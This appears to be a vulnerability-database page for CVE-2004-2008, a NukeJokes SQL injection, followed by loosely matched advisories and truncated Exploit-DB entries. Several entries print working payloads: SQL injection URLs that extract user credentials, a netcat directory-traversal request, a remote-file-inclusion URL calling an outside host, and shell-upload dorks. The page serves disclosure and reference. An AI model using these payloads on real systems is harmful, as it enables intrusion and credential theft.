CVE-2004-2008
published 2004-05-08CVE-2004-2008: SQL injection vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to execute arbitrary SQL via the jokeid parameter.
PriorityP429medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
1.71%
74.5th percentile
SQL injection vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to execute arbitrary SQL via the jokeid parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adam_webb | nukejokes | — | — |
| adam_webb | nukejokes | — | — |
CVSS provenance
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xvhq-4mp3-f354: SQL injection vulnerability in modules
ghsa_unreviewed·2022-04-29
CVE-2004-2008 [MEDIUM] GHSA-xvhq-4mp3-f354: SQL injection vulnerability in modules
SQL injection vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to execute arbitrary SQL via the jokeid parameter.
Red Hat
kvm: qemu-nbd block format auto-detection vulnerability
vendor_redhat·2013-04-15·CVSS 4.9
CVE-2013-1922 [MEDIUM] kvm: qemu-nbd block format auto-detection vulnerability
kvm: qemu-nbd block format auto-detection vulnerability
qemu-nbd in QEMU, as used in Xen 4.2.x, determines the format of a raw disk image based on the header, which allows local guest OS administrators to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted, a different vulnerability than CVE-2008-2004.
Statement: Not vulnerable.
This issue does not affect versions of kvm and xen packages as shipped with Red Hat Enterprise Linux 5. This issue does not affect versions of qemu-kvm packages as shipped with Red Hat Enterprise Linux 5 and 6.
Package: kvm (Red Hat Enterprise Linux 5) - Not affected
Package: qemu-kvm (Red Hat Enterprise Linux 6) - Not affected
Red Hat
perl: File:: Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
vendor_redhat·2008-11-19·CVSS 2.6
CVE-2008-5302 [LOW] perl: File:: Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
perl: File:: Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
Race condition in the rmtree function in File::Path 1.08 and 2.07 (lib/File/Path.pm) in Perl 5.8.8 and 5.10.0 allows local users to create arbitrary setuid binaries via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error related to CVE-2005-0448. It is different from CVE-2008-5303 due to affected versions.
Red Hat
perl: File:: Path rmtree race condition (CVE-2004-0452) reintroduced after upstream rebase to 5.8.8-1
vendor_redhat·2008-11-19·CVSS 2.6
CVE-2008-5303 [LOW] perl: File:: Path rmtree race condition (CVE-2004-0452) reintroduced after upstream rebase to 5.8.8-1
perl: File:: Path rmtree race condition (CVE-2004-0452) reintroduced after upstream rebase to 5.8.8-1
Race condition in the rmtree function in File::Path 1.08 (lib/File/Path.pm) in Perl 5.8.8 allows local users to to delete arbitrary files via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error related to CVE-2005-0448. It is different from CVE-2008-5302 due to affected versions.
Red Hat
qemu/kvm/xen: add image format options for USB storage and removable media
vendor_redhat·2008-08-07·CVSS 2.1
CVE-2008-1945 [LOW] qemu/kvm/xen: add image format options for USB storage and removable media
qemu/kvm/xen: add image format options for USB storage and removable media
QEMU 0.9.0 does not properly handle changes to removable media, which allows guest OS users to read arbitrary files on the host OS by using the diskformat: parameter in the -usbdevice option to modify the disk-image header to identify a different format, a related issue to CVE-2008-2004.
Red Hat
perl: insecure use of chmod in rmtree
vendor_redhat·2008-06-20·CVSS 2.6
CVE-2008-2827 [LOW] perl: insecure use of chmod in rmtree
perl: insecure use of chmod in rmtree
The rmtree function in lib/File/Path.pm in Perl 5.10 does not properly check permissions before performing a chmod, which allows local users to modify the permissions of arbitrary files via a symlink attack, a different vulnerability than CVE-2005-0448 and CVE-2004-0452.
Statement: Not vulnerable. This issue did not affect the versions of perl as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5, Red Hat Application Stack 1, or Solaris versions of Red Hat Directory Server 7.1 and 8, Certificate System 7.x.
Red Hat
qemu/kvm/xen: qemu block format auto-detection vulnerability
vendor_redhat·2008-04-27·CVSS 4.9
CVE-2008-2004 [MEDIUM] qemu/kvm/xen: qemu block format auto-detection vulnerability
qemu/kvm/xen: qemu block format auto-detection vulnerability
The drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted.
Red Hat
cups: incomplete fix for CVE-2004-0888 / CVE-2005-0206
vendor_redhat·2008-04-01·CVSS 10.0
CVE-2008-1374 [CRITICAL] cups: incomplete fix for CVE-2004-0888 / CVE-2005-0206
cups: incomplete fix for CVE-2004-0888 / CVE-2005-0206
Integer overflow in pdftops filter in CUPS in Red Hat Enterprise Linux 3 and 4, when running on 64-bit platforms, allows remote attackers to execute arbitrary code via a crafted PDF file. NOTE: this issue is due to an incomplete fix for CVE-2004-0888.
Red Hat
namazu XSS flaw
vendor_redhat·CVSS 7.5
CVE-2008-1468 [HIGH] namazu XSS flaw
namazu XSS flaw
Cross-site scripting (XSS) vulnerability in namazu.cgi in Namazu before 2.0.18 allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input, related to failure to set the charset, a different vector than CVE-2004-1318 and CVE-2001-1350. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
exploitdb·2016-05-31·CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
---
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'openssl'
class MetasploitModule "HP Data Protector Encrypted Communication Remote Command Execution",
'Description' => %q{
This module exploits a well known remote code exection exploit after es
Exploit-DB
HP Data Protector A.09.00 - Arbitrary Command Execution
exploitdb·2016-05-26·CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Arbitrary Command Execution
HP Data Protector A.09.00 - Arbitrary Command Execution
---
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As is provides no authentication it is not a viable workaround to prevent the
# exploitation of well known Data Protector issues such as cve-2014-2623
#
# This exploit establishes and unauthenticated encrypted communication channel to
# a Data Protector Agent and
Exploit-DB
greeting card - Arbitrary File Upload
exploitdb·2010-06-06
greeting card - Arbitrary File Upload
greeting card - Arbitrary File Upload
---
# Exploit Title: [greeting card Remote Upload Vulnerability]
# Date: [04/06/2010]
# Author: [Mr.Benladen]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : [email protected]
##############################
########################################################################
# # # #
# # # #
# # # #
# ## #### ## #
## ## ###### ## ##
## ## ###### ## ##
## ## #### ## ##
### ############ ###
########################
Mr.Benladen cr3w
##############
######## ########## #######
### ## ########## ## ###
### ## ########## ## ###
### # ########## # ###
### ## ######## ## ###
## # ###### # ##
## # #### # ##
## ##
########################################################################
Exploit-DB
GarageSales - Arbitrary File Upload
exploitdb·2010-04-09
GarageSales - Arbitrary File Upload
GarageSales - Arbitrary File Upload
---
# Exploit Title: [GarageSales Remote Upload Vulnerability]
# Date: [06/04/2010]
# Author: [saidinh0]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : [email protected]
###################################################
| Intorduction :`|
Hi everybody , This my first bug (Remote Upload Vulnerability) and I wish you like it :p
###################################################
[Dork ]: inurl:post.php?Category=Garage
{exploit} : http://127.0.0.1/post.php?Category=Garage
Example : http://[site]/searchgarage/post.php?Category=Garage
After you have uploaded your shells , you will find it in this Path : http://[site]/up_files/YouRShell.php
Example : http://[site]/searchgarage/up_fi
Exploit-DB
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
exploitdb·2008-10-06·CVSS 7.8
CVE-2008-4421 [HIGH] Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
---
Title: MetaGauge 1.0.0.17 Directory Traversal
Vendor: Hammer Software
Vendor URL: www.Hammer-Software.com
Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.
Description:
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server.
Example:
C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1
Patch Information:
Hammer has addressed the issue in the latest version of MetaGauge:
http://dl.hammer-software.com/metagauge.zip
CVE: CVE-2008-4421
Credit:
Brad Antoniewicz
[email protected]
# milw0rm.com [2008-10-06]
Exploit-DB
Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection
exploitdb·2008-10-05
CVE-2008-4516 Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection
Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection
---
#!/usr/bin/perl
#####################################################################################
#
# Galerie 3.2 (galerie.php) Remote "Blind" SQL Injection
#
# found by: J0hn.X3r
# exploit written by: J0hn.X3r and electron1x
# Date: 05.10.2008
# Dork: "Galerie 3.2 © 2004 by progressive"
#
# Contact:
# J0hn.X3r
# [+] ICQ: 573813
# [+] Mail: J0hn.X3r[at]gmail.com
# electron1x
# [+] Mail: electron1x *at* mail *dot* ru
#
# Greetz to: nexos, Barbers, -tmh-, Patrick_B, Sector, Loader007, n00bor
# Mac_Hack, Five-Three-Nine, f0Gx, bizzit, h0yt3r, no_swear_ftW,
# Lidloses_Auge, Sys-Flaw, Free-hack, Universal Crew & rest :-)
#
#####################################################################################
#
# First, Galerie 3.2
Exploit-DB
Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service
exploitdb·2008-09-16
CVE-2008-7011 Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service
Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service
---
source: https://www.securityfocus.com/bid/31205/info
Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
The following applications using the engine are vulnerable:
Unreal Tournament 3.1.3
Unreal Tournament 2003
Unreal Tournament 2004
Dead Man's Hand
Pariah
WarPath
Postal 2
Shadow Ops
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32386.zip
Exploit-DB
Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method
exploitdb·2008-09-10
CVE-2008-4699 Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method
Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method
---
arg1="C:/WINDOWS/system32/calc.exe"
target.ExecutePreferredApplication arg1
# milw0rm.com [2008-09-10]
Exploit-DB
Xerox Phaser 8400 - Remote Reboot (Denial of Service)
exploitdb·2008-08-03
CVE-2008-3571 Xerox Phaser 8400 - Remote Reboot (Denial of Service)
Xerox Phaser 8400 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
# carved-out by: crit3rion, just making th3 world a b3tt3r plac3!
# Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t)
# Make: Xerox
# Model: Phaser 8400
# Firmware: 03/03/2004
#
# What's the deal?
# Apparently, if you send an empty packet to a Xerox Phaser 8400 printer
# the printer will reboot. Tested successfully on four printers.
#
# Let's not leave our maliciousness open to exploitation and errors!
use strict;
use warnings;
use IO::Socket::INET;
# What's your printer's IP Address?
print "Please enter the printers IP:\n";
my $ipaddr = ;
chomp $ipaddr;
# Let's setup the connection...
my $socket = IO::Socket::INET->new(
PeerPort => 1900,
PeerAddr => $ipaddr,
Proto =>
Exploit-DB
Unreal Tournament 2004 - Null Pointer Remote Denial of Service
exploitdb·2008-07-30
CVE-2008-3396 Unreal Tournament 2004 - Null Pointer Remote Denial of Service
Unreal Tournament 2004 - Null Pointer Remote Denial of Service
---
source: https://www.securityfocus.com/bid/30427/info
Unreal Tournament 2004 is prone to a remote denial-of-service vulnerability because the application fails to handle NULL-pointer exceptions.
An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
This issue affects Unreal Tournament 2004 v3369 and prior versions.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32125.zip
Exploit-DB
Joomla! Component Content 1.0.0 - 'itemID' SQL Injection
exploitdb·2008-07-08
CVE-2008-6923 Joomla! Component Content 1.0.0 - 'itemID' SQL Injection
Joomla! Component Content 1.0.0 - 'itemID' SQL Injection
---
Joomla Component com_content SQL Injection Vulnerabity
Author : unknown_styler
Dork : inurl:com_content
POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*
Greetings : h4ck-y0u.org
side note:
Página de contenido
Projecte Joomla!
July 2004
(C) 2005 Open Source Matters. All rights reserved.
http://www.gnu.org/copyleft/gpl.html GNU/GPL
[email protected]
www.joomla.org
1.0.0
# milw0rm.com [2008-07-08]
Exploit-DB
ClanLite 2.x - SQL Injection / Cross-Site Scripting
exploitdb·2008-05-12
CVE-2008-5215 ClanLite 2.x - SQL Injection / Cross-Site Scripting
ClanLite 2.x - SQL Injection / Cross-Site Scripting
---
########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################
ClanLite V2 SQL inj. & XSS
dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005
dork: Themed By Ray © 2003, 2004 iOptional
readme script
/****************************************************************************
* Fichier : *
* Copyright : (C) 2004 ClanLite V2 *
* Email : [email protected] *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
******************************************************************
Exploit-DB
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
exploitdb·2008-03-07
CVE-2008-0118 Microsoft Office 2000/2003/2004/XP - File Memory Corruption
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
---
source: https://www.securityfocus.com/bid/28146/info
Microsoft Office is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open a malicious Office file.
Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz
Exploit-DB
Aconon Mail 2004 - Directory Traversal
exploitdb·2008-01-23
CVE-2008-0464 Aconon Mail 2004 - Directory Traversal
Aconon Mail 2004 - Directory Traversal
---
Application: aconon(R) Mail
Affected versions: probably all known, tested against 2007 Enterprise
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1
Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...)
Exploitation: remote
Description: Aconon Mail is a commercial newsletter software, providing
a feature rich web interface for both, users and administrators. This
includes a public available archive of sent newsletters. Those archived
e-mails may be accessed through the web browser, processed by a template
engine. The used template may be overwritten by any user, modifying the
HTTP-GET "template" form parameter. This parameter is checked against
code injection, not against directory traversal though.
Proof of Concept:
http://www.aco
Exploit-DB
samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
exploitdb·2008-01-05
CVE-2008-0187 samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
---
Title:samPHPweb (songinfo.php) Remote SQL Injection
Script:samPHPweb
Download:http://www.spacialaudio.com/download/samPHPweb.zip
Bug:songinfo.php
Author:BackDoor
Dork1:inurl:samPHPweb/playing.php
Dork2:This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
Exploit:
www.victim.com/scriptpath/songinfo.php?songid=-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,password,user,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/from/**/mysql.user
# milw0rm.com [2008-01-05]
Exploit-DB
samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
exploitdb·2008-01-04
CVE-2008-0143 samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
---
+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Script.......: samPHPweb
* [~] Page.........: http://support.spacialaudio.com/forums/viewforum.php?f=22 & http://www.spacialaudio.com/
* [~] Author.......: Crackers_Child | [email protected] & [email protected]
* [~] Class........: Remote File İnclude Vulnerability
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions
* [~] Dork.........: This page was produced using SAM2 (Streaming Audio Manager)
+____________________________________
Exploit-DB
JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
exploitdb·2006-10-04
CVE-2008-1609 JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
---
#===========================================================================================
#JAF CMS Remote file include (website)
#===========================================================================================
#
#Script name : JAF CMS
#
#Version : 4.0
#
#===========================================================================================
#Vulnerable Code :
#
# if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
#
#===========================================================================================
#Dork : powered by JAF CMS © 2004 - 2006
#
#Exploit :
#(1)
#http://www.site.com/[jmf_path]/module/forum/main.php?id=1&main_dir=http://www.milw0rm.com/index.php?&
#(2)
#http://ww
Exploit-DB
Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection
exploitdb·2004-05-08
CVE-2004-2008 Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection
Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection
---
source: https://www.securityfocus.com/bid/10306/info
It has been reported that the NukeJokes module is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input.
Multiple SQL injection issues exists due to a failure of the application to do any sanitization on user input prior to using the offending input in an SQL query.
These SQL issues may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data.
Multiple cross-site scripting vulnerabilities have been reported to exist due to a fai
Unit42
Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
blogs_unit42·2020-07-21·CVSS 10.0
CVE-2020-1350 [CRITICAL] Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
## Executive Summary
In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.
This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53/TCP. Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.
This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS):
- Windows Server 2008/2008 R2
- Windows Server 2012/2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server version 1803/1903/1909/2004 (Server Core installation)
#
Bugzilla
CVE-2013-1922 qemu, qemu-kvm, kvm: qemu-nbd block format auto-detection vulnerability
bugzilla·2013-03-19·CVSS 4.9
CVE-2013-1922 [MEDIUM] CVE-2013-1922 qemu, qemu-kvm, kvm: qemu-nbd block format auto-detection vulnerability
CVE-2013-1922 qemu, qemu-kvm, kvm: qemu-nbd block format auto-detection vulnerability
A security flaw was found in the way qemu-nbd, the QEMU Disk Network Block Device server tool of QEMU, performed detection of image formats (the image format has been previously autodetected). A guest operating system administrator could write a header to particular raw disk image format, describing another format than original one for that disk image, leading to scenario in which after restart of that guest, QEMU would detect new format of the image, and could allow the guest to read any file on the host if QEMU was sufficiently privileged.
A different vulnerability that CVE-2008-2004.
Discussion:
Acknowledgements:
This issue was found by Daniel Berrange of Red Hat.
---
Created attachment 712650
P
Bugzilla
CVE-2009-1887 net-snmp: DoS (division by zero) via SNMP GetBulk requests
bugzilla·2009-06-19·CVSS 5.0
CVE-2009-1887 [MEDIUM] CVE-2009-1887 net-snmp: DoS (division by zero) via SNMP GetBulk requests
CVE-2009-1887 net-snmp: DoS (division by zero) via SNMP GetBulk requests
It was discovered that remote attacker can cause net-snmp's snmpd to crash via specially crafted SNMP GetBulk requests, that triggers division by zero in the following code:
if (maxbulk maxresponses / r)
maxbulk = maxresponses / r;
This code has been added as part of the fix for CVE-2008-4309 (bug #469349). This problem never affected upstream net-snmp versions, thanks to following upstream commit from 2004:
http://net-snmp.svn.sourceforge.net/viewvc/net-snmp/trunk/net-snmp/agent/snmp_agent.c?r1=9583&r2=9695
This upstream change is part of net-snmp packages shipped in Red Hat Enterprise Linux 4 and later. Therefore this division by zero DoS only affects net-snmp in Red Hat Enterprise Linux 3.
Discussion:
This i
Bugzilla
CVE-2008-5302 perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
bugzilla·2008-11-28·CVSS 2.6
CVE-2008-5302 [LOW] CVE-2008-5302 perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
CVE-2008-5302 perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
Created attachment 325021
Ours perl-5.8.0-CAN-2005-0448-rmtree.patch applied against perl_5.8.0-90.4
Common Vulnerabilities and Exposures originally assigned an identifier CVE-2005-0448 to the following vulnerability:
Race condition in the rmtree function in File::Path.pm in Perl before 5.8.4 allows local users to create arbitrary setuid binaries in the tree being
deleted, a different vulnerability than CVE-2004-0452.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0448
It was discovered that after upstream perl rebase to 5.8.8-1, this issue
was reintroduced (seems upstream didn't apply fix for CVE-2005-0448).
This issue already fixed again in perl-5.1
Bugzilla
CVE-2008-2827 perl: insecure use of chmod in rmtree
bugzilla·2008-06-24·CVSS 2.6
CVE-2008-2827 [LOW] CVE-2008-2827 perl: insecure use of chmod in rmtree
CVE-2008-2827 perl: insecure use of chmod in rmtree
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-2827 to the following vulnerability:
The rmtree function in lib/File/Path.pm in Perl 5.10 does not properly
check permissions before performing a chmod, which allows local users
to modify the permissions of arbitrary files via a symlink attack, a
different vulnerability than CVE-2005-0448 and CVE-2004-0452.
References:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487319
http://rt.cpan.org/Public/Bug/Display.html?id=36982
Discussion:
Created attachment 310113
Test case extracted from CPAN bug report
---
This issue did not affect the versions of perl as shipped with Red Hat
Enterprise Linux 2.1, 3, 4, or 5, Red Hat Application Stack 1 and Fedora 8.
---
Propose
Bugzilla
CVE-2008-1374 cups: incomplete fix for CVE-2004-0888 / CVE-2005-0206
bugzilla·2008-03-20·CVSS 10.0
CVE-2008-1374 [CRITICAL] CVE-2008-1374 cups: incomplete fix for CVE-2004-0888 / CVE-2005-0206
CVE-2008-1374 cups: incomplete fix for CVE-2004-0888 / CVE-2005-0206
It was discovered that patch applied to cups packages as shipped in Red Hat
Enterprise Linux 3 and 4 to address security issues in xpdf code known as
CVE-2004-0888 / CVE-2005-0206 was incomplete.
On certain platforms, malicious pdf file could still cause a crash or possibly
cause code execution when it's processed by pdftops filter.
This issue affects 64-bit platforms. cups packages in Red Hat Enterprise Linux
5 are not affected by this problem.
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0206.html
http://marc.info/?l=bugtraq&m=108404714232579&w=2http://secunia.com/advisories/11579http://www.securityfocus.com/bid/10306http://www.waraxe.us/index.php?modname=sa&id=28https://exchange.xforce.ibmcloud.com/vulnerabilities/16099http://marc.info/?l=bugtraq&m=108404714232579&w=2http://secunia.com/advisories/11579http://www.securityfocus.com/bid/10306http://www.waraxe.us/index.php?modname=sa&id=28https://exchange.xforce.ibmcloud.com/vulnerabilities/16099
2004-05-08
Published